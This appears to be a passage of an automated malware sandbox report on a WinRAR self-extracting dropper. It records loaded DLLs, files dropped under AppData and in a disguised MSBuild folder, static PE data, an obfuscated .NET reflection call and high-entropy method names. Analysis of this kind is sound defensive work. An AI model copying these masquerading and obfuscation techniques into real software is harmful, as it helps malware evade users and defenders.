                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\7vP2IvNXqx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\e226a7d7102d53
Source: 7vP2IvNXqx.exe Static file information: File size 1978248 > 1048576
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7vP2IvNXqx.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 7vP2IvNXqx.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7vP2IvNXqx.exe
Source: Binary string: System.Windows.Forms.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: KZll\System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2201826455.000000001B201000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source: 7vP2IvNXqx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7vP2IvNXqx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7vP2IvNXqx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7vP2IvNXqx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7vP2IvNXqx.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.cs .Net Code: Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777246)),Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777260))})
Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.cs .Net Code: Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777246)),Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777260))})
Source: C:\Users\user\Desktop\7vP2IvNXqx.exe File created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\__tmp_rar_sfx_access_check_5389750
Source: 7vP2IvNXqx.exe Static PE information: section name: .didat
Source: winIntorefruntimebroker.exe.0.dr Static PE information: section name: .text entropy: 7.424721058319474
Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.dr Static PE information: section name: .text entropy: 7.424721058319474
Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Ve1cELzpXOAiOjGbv9.cs High entropy of concatenated method names: 'K8Hkkgc7Ct', 'FEEkGMiCNl', 'XUNk20PNnc', 'lTHk3Qg1WO', 'Xgmkw9g3vn', 'VgJkqaSNyr', 'JxKkJddVrD', 'KJ5TcTktTSaYcWqwrT4k', 'kLakkKktiLGeyqrqbSys', 'bftckOktF6fBRooTBgJL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, a9PE5WRE9xrARfrPalW.csHigh entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, BeNFHgCrZNSspLG2KNU.csHigh entropy of concatenated method names: 'XBfC9rpJNo', 'SiqCeBoWJh', 'NYQCP8ySCc', 'DrGvDHkOh1NCDxHFpoa5', 't4SWPMkOgKwyIIH7wZuf', 'wyAJYekOlcy6rBWty7o5', 'XoKBvakOEN6S54HvBt4Y', 'WIKnPIkOKdK5GQBYPfN2', 'T04IU0kO68tJ7AyktsRL'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, ppUjAxiU9Njow2oOIX9.csHigh entropy of concatenated method names: 'AEm', 'by1', 'KG0imDlAMP', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, fvElIZ3mw2XT4qS18HS.csHigh entropy of concatenated method names: 'MQp3vWVM0v', 'KcK3MSmYdS', 'J5hopAksaKNEflCvZE1m', 'MKR6A7kscENgRjHx2Uaf', 'NgfOtbks470VD61UYfLw', 'albFMQksRvoSu5cV78vQ', 'b5gwkA3Fec', 'AGyZh5ksNiBZcpJ6cjGh', 'c7179vksXOkr2pPR53m9', 'raAMxQksOUdCfwQ1BGNg'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, GaviKWj7ZralkGFucoG.csHigh entropy of concatenated method names: 'wMbky5gZEBZ', 'Ckojb2w356', 'Q0vjWQ9pJ1', 'UcIj1cJhmP', 'lvwOINkWVT4vXgKntTy1', 'WT99cHkWXTZtFYoXZ2mk', 'lSeSHJkWO6rtd8RcPQb6', 'XijEdIkWN1Gr5LPYaY5O', 'G0dQmkkWI7yo0CerTJoJ', 'BN75kmkWx4su9gGGScVK'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, UIsIJDGWeWaypY2axBZ.csHigh entropy of concatenated method names: 'JVGGuC6avl', 'eZSnt1kiV1k0Y8rbUV8N', 'u8Zdp4kiXLG7uvH2UpVs', 'slOy8ikiOvFX08qiCRmT', 'eXJCyHkiNAvI3yUh7IeP', 'TcQZdckiaw2gT4dcNsKg', 'PggYE3kiR9x6raB2tFEF'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, SlLs2JqHlBXN0cf56Hf.csHigh entropy of concatenated method names: 'zNjqZdqgDq', 'YdYqCSCxqu', 'CbDqrJwZxQ', 'pVhefFkcvd5idR7kKkje', 'ChkXB2kcMSnR1Qv9emoI', 'EOPTbqkcfA8lGJExOoNY', 'aGWFX4kczFQ5Ap6kMbOG', 'jiK6gUk4pSOnPv1GJ8jV'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, e1RmYyY2DIJC3nRnLSu.csHigh entropy of concatenated method names: 'cgkYw014si', 'wdXYqCZmOL', 'R7fYystxwR', 'eVuYJNyrCb', '_0023Nn', 'Dispose', 'vr78eNkukELSOwVuXIGm', 'skpamxku8bK5JoctVB7n', 'mT3XOXkuGUrYnx62dPM1', 'UqN4Nuku2Xl2IyAmJUnZ'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, SIaDYtZBRQ7pqpEESFK.csHigh entropy of concatenated method names: 'zMvZ5edhWN', 'DQHZm143dw', 'LSbZSiENCE', 'TK3ZdPTM5M', 'M5oZjn4VVC', 'COM7RVkO29B4BNZibxOH', 'eEhnQ4kO80ysxqZd3kTY', 'dXDNN5kOGRNJDKAnnOBm', 'KCBhKrkO34vteeaXpkgO', 'qD8xEokOwg0ahw0tQdxx'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, O8IRanMhFUERYs4psDF.csHigh entropy of concatenated method names: 'rGLMcxaI4e', 'mVRM4wGnuE', 'ThnMaDunlu', 'MCMMRs3gMI', 'bT1MVlYCAi', 'ftlMXT79KK', 'QIBMOibo7T', 'n2vMN7jD3e', 'mgoMIKqA3D', 'n70MxbW3LS'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, UdT46Wd7Z5V2rKtRJeb.csHigh entropy of concatenated method names: 'AyudbDBE04', 'CkudWmOs7b', 'Xyld1V6yys', 'JVWduN9OO6', 'PDndvQuRpi', 'TEPdMhAeZF', 'ejMdf9egcI', 'woudzZo6K2', 'RCVjpH0vSv', 'abyjkh7yv9'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Bm7cHek105oAiFrOLkG.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'cE4kyAKkBxp', 'HY1kGjqsMBO', 'UqJQ0pknDuqpnC3y3aTd', 'UQPv8hknt30HQR4ubrOZ', 'hH0MH8knnmyNFU8iKZAg'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, zJZEXjySSIsZb6lI4D9.csHigh entropy of concatenated method names: 'O8hyW5LfYW', 'hEEy1ek9GG', 'P9myuWby9t', 'namyvC12eq', 'iclyMaYCvc', 's2jyfZ6CfI', 'oT3yzrScOF', 'wg4U8ukaTGhmw4BndmjC', 'NWIU3qkat8tnkbcr0Tap', 'LdVt5MkanbLBUuWAjdlC'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, w4Rh9T8iGcCfGTxqqlB.csHigh entropy of concatenated method names: 'QBD8Ny8tpl', 'qUp4X2kTe7I91Maud0MU', 'YEhEgkkTPdugAAydX3Ss', 'kSfmglkTAIdT2R8ZNiLW', 'gT1ZUbkTgTCfJvGyeeX4', 'Vf1QUqkTlEk0fsD7ypff', 'olS8sjb5rJ', 'JgT8cTej0t', 'xxH84UnDeU', 'urW8aSekKe'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, KFyh7i32JRlE78nagrw.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'O323whvWVy', 'NGR3qdhEO8', 'jgx3ypr6gN', 'wcDYIMkF7VBs2LOOJsGv', 'rEqsaYkFYQNHfC5mlRPj', 'OP8aZAkFbviM5LHSa4Tx', 'cDfW4rkFWPv35jQJ1wFu', 'D7FHkAkF1WcvOgGPbILn'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, W1qbCtoXdCEqkNwqP7j.csHigh entropy of concatenated method names: '_2SY', 'JAvkyRp6aXv', 'KB4oN3rkZn', 'bEMkyVki5eT', 'Gr06XukVKxrxWIT308jX', 'lEpw0qkVhF0T0koyYBnZ', 'yfmKYPkVEm2ViLqJ5FhS', 'NLRCILkV6pxJgVEGuqO5', 'EZHj9akVQU4Kkv54IdgB', 'vqUvwVkVDIvxkygQGBv4'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, yXc9xTkDaOWaSaiLAOY.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aTUkyLnuyWT', 'HY1kGjqsMBO', 'TAd8DMktW9FftdQ05mjG', 'CCaE6qkt1BR0T60NSkgS', 'fudeHLktu5x4U9s9Cbia'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, l26juAHiEXBwvKqpSCZ.csHigh entropy of concatenated method names: 'BjbZArJtup', 'iGBj1CkXmoVJFLuoNV9H', 'O3h3pmkXU2XVbiDITob9', 'dPdnlGkX55ivjPnI7VAx', 'vCIZTIkXSXOfEYdws37E', 'e7FHsZUp8x', 'd47HcdoHaT', 'jDuH4jCog2', 'sNcHapXo8c', 'WC2HR2aBRx'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, jyrVLy3Z2imgPxywK9e.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'nO6kylHpIFU', 'AgikGzNCMK9', 'Cg16k2ks8XYy9VDYgdw5', 'KjcR2yksGDuU4AvpXP9U', 'cg7EJsks2T4WIBnZ0D2Q', 'wtJ0Ukks3iw2EQmrOutb', 'a8hp64kswEmPQpYchyNq'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, bJeJaqcEDpnNxATInDg.csHigh entropy of concatenated method names: 'v1O4Lb8qt9', 'idY7eGkj16g75i3STUkd', 'g4LDGYkjuJoYA2LdN6sq', 'GRlPT2kjvfuNVouuJsxb', 'i5X', 'EtVc6a1VEB', 'W93', 'L67', '_2PR', 'p6J'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, yimSUtocdTMZdKd81Ih.csHigh entropy of concatenated method names: 'Yi3', 'uwqky40mLkm', 'lgsoaLNSQT', 'VlgkyaUkPuO', 'xqThAokV9NOQdbNCXcFO', 'oHffaCkVeFLcW1QKmDmJ', 'ylKAWukVrHMNYJtAe8BF', 'X9uDcBkVLUK7wJEHFsio', 'CXHD5HkVPUfSjvrBvQUO', 'ERtU1gkVAS7UwnrPgJOB'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, thJmf8G9pfGt1wnVJmY.csHigh entropy of concatenated method names: 'dF5GnN4u9K', 'KjsGTMmQTu', 'Kf9GiWVthK', 'xjh2unkirNIQWNk1BveL', 'SLrjvSkiZB304eU0BXt2', 'i6rACOkiCajnaJL0DTgp', 'ntBFwrkiLWB4pN4xjCU1', 'vvGG6Ssp54', 'fiUGQ79qNR', 'zS4qVqkioBSaJYlsrNkx'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, jN6GT5e8kfd4FTJRnJc.csHigh entropy of concatenated method names: 'wdceetwty5', 'NLyeAFxRhv', 'sv6e2dMQoj', 'hlge3wWkXG', 'JBpewPP0gF', 'yCfeqqoKM4', 'M0Seyx8eMa', 'VPAeJkUJXv', 'onueogI9Ac', 'T2ReHHC9ix'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, bmWJCmnGmJi2g1h4uU9.csHigh entropy of concatenated method names: 'vKin3THyfv', 'EyNnwIrSiY', 'v4SnqVnRHF', 'VQmnyYQRZb', 'jf6nJsGJSk', 'wbkT3ck5vAuhWAbB3l5j', 'dDvDY6k51USZC76cj2Pd', 'F5CbOvk5uoKlByOmvhy2', 'zmxUJqk5MQFRhdN0NCbL', 'ppRcxnk5fcnWmZ6Y8dLm'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, pDPQKAVPQdLebvFxeLx.csHigh entropy of concatenated method names: 'r0OVgerxL2', 'wNUVlHuLKa', 'QHQVhhJ28r', 'EZOVErwvnR', 'f7ZVKeA71s', 'GZoV6SGwtp', 'DQkVQZFFra', 'TP0VDiS3Mr', 'R2tVtxCstA', 'e5OVnjHkmB'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, t58gH1LzSC4162RXVQU.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'eys9kTCDhj', 'zVk98Lb9KI', 'gY2', 'rV4', '_28E'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Xhfh6t8k6AEm3HiTQxh.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'kiZkygcknm6', 'HY1kGjqsMBO', 'msaCkeknaKiTcACkV5Sc', 'nrqhGtknRqx8RnQyRso3', 'PbNAh4knVQ3RFPYHCF2m'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, gvLAEU3EcG337IeIPWx.csHigh entropy of concatenated method names: 'lZh3aHesDX', 'kcp3RDgGY2', 'b9Wbr1ksEI9Cdx7GHcWd', 'ANkLv2ksKE4WBuGpsYHG', 'Ow736iDVp0', 'RmK3QPxl6F', 'uqW3DIlpvv', 'ynL3tpF5Ef', 'Wib3nHoTTu', 'K3T3TI818g'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, FBmtbAueepP1Y0u626M.csHigh entropy of concatenated method names: 'irS835UmASP', 'wtyrGckMEdrcvHxthSl5', 'hGCNPYkMKHeN2yBV9jNH', 'oWYLfhkM6O55Z01qXWFR', 'IIDA0EkMQVoqs9J8mMnt'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, BoBUuSebhyUJRedHPla.csHigh entropy of concatenated method names: 'YBaCL7kBOCEAN6Jd7EMJ', 'wLfI2GkBViOWbjaienSd', 'hjAb2TkBXw4AYWlbKOcq', 'LQN6FikBNuG1Zgb0R8Rg', 'MWDEQivN5a', 'CEcDZakBUlXtpj6nPlrr', 'q4bMoHkBx8fJRyS5oauL', 'FYcU2gkBBFOWwWuAjZuW', 'DtqBwqkB5aPEyhWFKhUV', 'bAwIEqkBmmRf9OP5TSME'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, AvoTdUrfxxyY7sd61mu.csHigh entropy of concatenated method names: 'iiDLp37miX', 'Sb5LkNHuY9', 'pSgL8PdIFY', 'vBALGdwiXi', 'qKxL2N3qef', 'UtUK3SkNqwaUFAbGmqQs', 'gt0iyQkNyMsptHruG0dF', 'xrPnmCkNJVq9llP4Xb42', 'cHTguEkNoEqJAwDbuwha', 'HF5lH1kNHRuYILaT28DR'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, dWjKsOZieIqqsU4xFwU.csHigh entropy of concatenated method names: 'L2l', 'Jo5', '_2EF', 'i4P', '_6c7', '_77i', '_38r', '_142', 'Xhv', 'eT3'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, pnHVjbCYmD4kSpDeZb6.csHigh entropy of concatenated method names: 'tvVCW7yI3Y', 'rtrC1McxtT', 'wLUCuULKyj', 'fqDCvMDjep', 'uZ8CM6Lwxf', 'KU4QmIkOxy4Bvbr6i1dM', 'Dq5vwpkONbtgkKZxehYL', 'LCK72KkOIVCc4ea3fSqm', 'nCyBTTkOB5YX9VJVTlgY', 'K8I1GRkOUFxeLJXDf3Ge'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, tFJ2ZYrARmC53dqdM0b.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'upKrlKhJaw', '_947', 'tXGrh6p9iM', 'eoFrEsOZtx', '_1f8', '_71D'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, cwhXhM8yhd1X7huhsEL.csHigh entropy of concatenated method names: 'Huy8oQvOAD', 'Kg48H8pcV4', 'bHb80gMFjw', 'a4VOhBknUT56eN6JQIV0', 'bufCONkn5HnBbeLsV72o', 'XyEKOgknm1LDAqwvyO2C', 'fKXOKmknSeqd9HqMtlcT', 'e8S8dUkndHfDTqh0BaqC', 'PZcPGdknjLbBpEGOAW8K', 'vQvML6kn78qgQb1FKlIg'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, jIVF2XjuUTSTbjVWYVy.csHigh entropy of concatenated method names: 'IdX70mOabb', 'XEE2tbk1e1KhHrTqUlkE', 'kKeXHOk1P3Xg6bXyJGkW', 'IRNJtdk1LC6C1Wdah7TF', 'Nfn3O5k190CQRbqMR2dy', 'EZGe8pk1AhdtPjgFTxEB', 'CPX', 'h7V', 'G6s', '_2r8'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, UAhFZSiV04MSVPQJUpr.csHigh entropy of concatenated method names: 'ngPiOOkI53', 'XdNiNN5suu', 'wSOiIES5D0', 'G9bixBKpAL', 'RqEiBgkuEQ', 'VxquKckdQ6fGLMvgDEnT', 'cReZ0mkdDvp1qVwJbjsp', 'VJWTlYkdKeAGiusYZbVl', 'EGqIFhkd6N1wNsoUF0W5', 'd4xKQXkdtZWhYvYs82Yl'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, uFG2SYJF7LoJcbj3jVP.csHigh entropy of concatenated method names: 'mPGJNmhZUj', 'ooBFtUkRHHnsGiePnMY3', 'w3cu7ekRJ79vQtnEjP9M', 'msAWSVkRooluTdvHS93K', 'etW08JkR0jjHBe35hFXM', 'j1PvNYkRZoXD5OqEaAJk', 'UU8', 'd65', 'ufOk2CBbX0E', 'K8bk2rwEn2C'
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, IFkZCCGSvkwuD5n9KJt.csHigh entropy of concatenated method names: 'K6XGYQKmhm', 'RWydSckistDB6yL8Qia4', 'w1kUbBkiiQ6rdbBUX1BG', 'Kscr8ukiFHZkB8uJ13HB', 'hjGCxlkictbytl9KL0o7', 'ISyGj6VcZA', 'WkrMlbkiDTedHWjgUSCN', 'CqXoyrkitRyJj3uShyO6', 's3wrEcki6bdvOv3JicST', 'BLvWpvkiQjQhvD66RpTu'
Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, multiple .cs classes: High entropy of concatenated method names
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, yXc9xTkDaOWaSaiLAOY.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aTUkyLnuyWT', 'HY1kGjqsMBO', 'TAd8DMktW9FftdQ05mjG', 'CCaE6qkt1BR0T60NSkgS', 'fudeHLktu5x4U9s9Cbia'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, l26juAHiEXBwvKqpSCZ.csHigh entropy of concatenated method names: 'BjbZArJtup', 'iGBj1CkXmoVJFLuoNV9H', 'O3h3pmkXU2XVbiDITob9', 'dPdnlGkX55ivjPnI7VAx', 'vCIZTIkXSXOfEYdws37E', 'e7FHsZUp8x', 'd47HcdoHaT', 'jDuH4jCog2', 'sNcHapXo8c', 'WC2HR2aBRx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jyrVLy3Z2imgPxywK9e.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'nO6kylHpIFU', 'AgikGzNCMK9', 'Cg16k2ks8XYy9VDYgdw5', 'KjcR2yksGDuU4AvpXP9U', 'cg7EJsks2T4WIBnZ0D2Q', 'wtJ0Ukks3iw2EQmrOutb', 'a8hp64kswEmPQpYchyNq'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, bJeJaqcEDpnNxATInDg.csHigh entropy of concatenated method names: 'v1O4Lb8qt9', 'idY7eGkj16g75i3STUkd', 'g4LDGYkjuJoYA2LdN6sq', 'GRlPT2kjvfuNVouuJsxb', 'i5X', 'EtVc6a1VEB', 'W93', 'L67', '_2PR', 'p6J'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, yimSUtocdTMZdKd81Ih.csHigh entropy of concatenated method names: 'Yi3', 'uwqky40mLkm', 'lgsoaLNSQT', 'VlgkyaUkPuO', 'xqThAokV9NOQdbNCXcFO', 'oHffaCkVeFLcW1QKmDmJ', 'ylKAWukVrHMNYJtAe8BF', 'X9uDcBkVLUK7wJEHFsio', 'CXHD5HkVPUfSjvrBvQUO', 'ERtU1gkVAS7UwnrPgJOB'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, thJmf8G9pfGt1wnVJmY.csHigh entropy of concatenated method names: 'dF5GnN4u9K', 'KjsGTMmQTu', 'Kf9GiWVthK', 'xjh2unkirNIQWNk1BveL', 'SLrjvSkiZB304eU0BXt2', 'i6rACOkiCajnaJL0DTgp', 'ntBFwrkiLWB4pN4xjCU1', 'vvGG6Ssp54', 'fiUGQ79qNR', 'zS4qVqkioBSaJYlsrNkx'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, jN6GT5e8kfd4FTJRnJc.csHigh entropy of concatenated method names: 'wdceetwty5', 'NLyeAFxRhv', 'sv6e2dMQoj', 'hlge3wWkXG', 'JBpewPP0gF', 'yCfeqqoKM4', 'M0Seyx8eMa', 'VPAeJkUJXv', 'onueogI9Ac', 'T2ReHHC9ix'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, bmWJCmnGmJi2g1h4uU9.csHigh entropy of concatenated method names: 'vKin3THyfv', 'EyNnwIrSiY', 'v4SnqVnRHF', 'VQmnyYQRZb', 'jf6nJsGJSk', 'wbkT3ck5vAuhWAbB3l5j', 'dDvDY6k51USZC76cj2Pd', 'F5CbOvk5uoKlByOmvhy2', 'zmxUJqk5MQFRhdN0NCbL', 'ppRcxnk5fcnWmZ6Y8dLm'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, pDPQKAVPQdLebvFxeLx.csHigh entropy of concatenated method names: 'r0OVgerxL2', 'wNUVlHuLKa', 'QHQVhhJ28r', 'EZOVErwvnR', 'f7ZVKeA71s', 'GZoV6SGwtp', 'DQkVQZFFra', 'TP0VDiS3Mr', 'R2tVtxCstA', 'e5OVnjHkmB'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, t58gH1LzSC4162RXVQU.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'eys9kTCDhj', 'zVk98Lb9KI', 'gY2', 'rV4', '_28E'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Xhfh6t8k6AEm3HiTQxh.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'kiZkygcknm6', 'HY1kGjqsMBO', 'msaCkeknaKiTcACkV5Sc', 'nrqhGtknRqx8RnQyRso3', 'PbNAh4knVQ3RFPYHCF2m'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, gvLAEU3EcG337IeIPWx.csHigh entropy of concatenated method names: 'lZh3aHesDX', 'kcp3RDgGY2', 'b9Wbr1ksEI9Cdx7GHcWd', 'ANkLv2ksKE4WBuGpsYHG', 'Ow736iDVp0', 'RmK3QPxl6F', 'uqW3DIlpvv', 'ynL3tpF5Ef', 'Wib3nHoTTu', 'K3T3TI818g'
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, FBmtbAueepP1Y0u626M.csHigh entropy of concatenated method names: 'irS835UmASP', 'wtyrGckMEdrcvHxthSl5', 'hGCNPYkMKHeN2yBV9jNH', 'oWYLfhkM6O55Z01qXWFR', 'IIDA0EkMQVoqs9J8mMnt'
